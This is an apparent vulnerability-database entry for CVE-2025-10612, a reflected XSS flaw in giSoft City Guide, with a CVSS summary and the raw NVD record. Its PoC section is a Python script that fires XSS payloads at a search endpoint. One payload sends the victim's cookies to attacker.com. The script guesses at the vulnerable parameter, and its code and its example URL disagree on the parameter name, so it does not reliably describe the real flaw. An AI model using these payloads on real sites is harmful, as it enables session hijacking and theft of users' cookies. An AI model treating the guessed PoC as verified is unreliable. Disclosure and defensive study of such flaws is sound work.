Security Vulnerability Report
中文
CVE-2025-10612 CVSS 6.1 MEDIUM

CVE-2025-10612

Published: 2025-10-21 09:15:34
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in giSoft Information Technologies City Guide allows Reflected XSS.This issue affects City Guide: before 1.4.45.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

giSoft City Guide < 1.4.45

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10612 Reflected XSS PoC for giSoft City Guide # Vulnerability: Reflected XSS via improper input neutralization # Affected versions: City Guide before 1.4.45 import requests TARGET_URL = "http://target-cityguide.com/search" # Example endpoint # The vulnerable parameter may vary; common candidates include search, query, id, etc. def exploit_xss(target_url, payload): """ Exploit reflected XSS by injecting malicious script into vulnerable parameter. """ params = { "search": payload # Replace with actual vulnerable parameter name } # Send request with malicious payload response = requests.get(target_url, params=params) # Check if payload is reflected without sanitization if payload in response.text: print(f"[+] XSS payload reflected successfully!") print(f"[+] Malicious URL: {response.url}") return True else: print("[-] Payload not reflected or sanitized.") return False # Example payloads for cookie stealing / session hijacking payloads = [ '<script>alert(document.cookie)</script>', '<img src=x onerror=alert(document.domain)>', '<svg/onload=alert(1)>', '";alert(String.fromCharCode(88,83,83))//', '<script>fetch("http://attacker.com/steal?c="+document.cookie)</script>' ] if __name__ == "__main__": for payload in payloads: print(f"\n[*] Testing payload: {payload}") exploit_xss(TARGET_URL, payload) # Note: A real attack URL would look like: # http://target-cityguide.com/search?q=<script>alert(document.cookie)</script> # When a victim clicks this link, the script executes in their browser context.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10612", "sourceIdentifier": "[email protected]", "published": "2025-10-21T09:15:34.300", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in giSoft Information Technologies City Guide allows Reflected XSS.This issue affects City Guide: before 1.4.45."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0350", "source": "[email protected]"}]}}